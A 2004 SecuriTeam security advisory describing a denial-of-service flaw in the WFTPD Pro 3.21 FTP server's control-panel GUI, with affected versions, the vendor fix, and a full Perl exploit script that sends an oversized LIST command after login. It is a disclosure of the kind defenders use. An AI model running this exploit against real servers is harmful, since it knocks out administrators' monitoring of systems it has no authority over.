Date: 17 Mar 2004 18:18:58 +0200
From: SecuriTeam <[email protected]>
To: [email protected]Subject: [NT] WFTPD GUI DoS
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
WFTPD GUI DoS
------------------------------------------------------------------------
SUMMARY
A vulnerability in WFTPD Pro allows a user issuing a long parameter
(around 300 bytes) as a value for almost all commands, to cause a DoS
attack against the controlling GUI of the WFTP Pro product. Once the
attack has been launched, an administrator can no longer open the GUI and
see the current connected users.
DETAILS
Vulnerable Systems:
* WFTPD version 3.21 Release 2
* WFTPD version 3.21 Release 1
Immune Systems:
* WFTPD version 3.21 Release 3
Vendor Status:
WFTPD Pro 3.21 Release 3 is released on March 16, 2004, to fix a potential
denial-of-service attack on the Control Panel applet discovered by STORM
<storm[at]securiteam[dot]com>. Also changed in this version - the output
to the control panel applet is changed to being sent only when a command
executes.
Exploit:
#!/usr/bin/perl
# Multiple Vulnerabilities in WFTPD FTP Server version 3.21.1
# Created by Beyond Security Ltd. - All rights reserved.
use IO::Socket;
$host = "192.168.1.243";
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "2119");
unless ($remote) { die "cannot connect to ftp daemon on $host" }
print "connected\n";
while (<$remote>)
{
print $_;
if (/220 /)
{
last;
}
}
$remote->autoflush(1);
my $ftp = "USER username\r\n";
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
print $_;
if (/331 /)
{
last;
}
}
$ftp = join("", "PASS ", "password", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
print $_;
if (/230 /)
{
last;
}
}
$ftp = join ("", "LIST ", "A"x260, "\r\n"); # DoS ...
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
print $_;
if (/250 Done/)
{
last;
}
}
close $remote;
ADDITIONAL INFORMATION
SecurITeam would like to thank <mailto:[email protected]> STORM for
finding this vulnerability.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
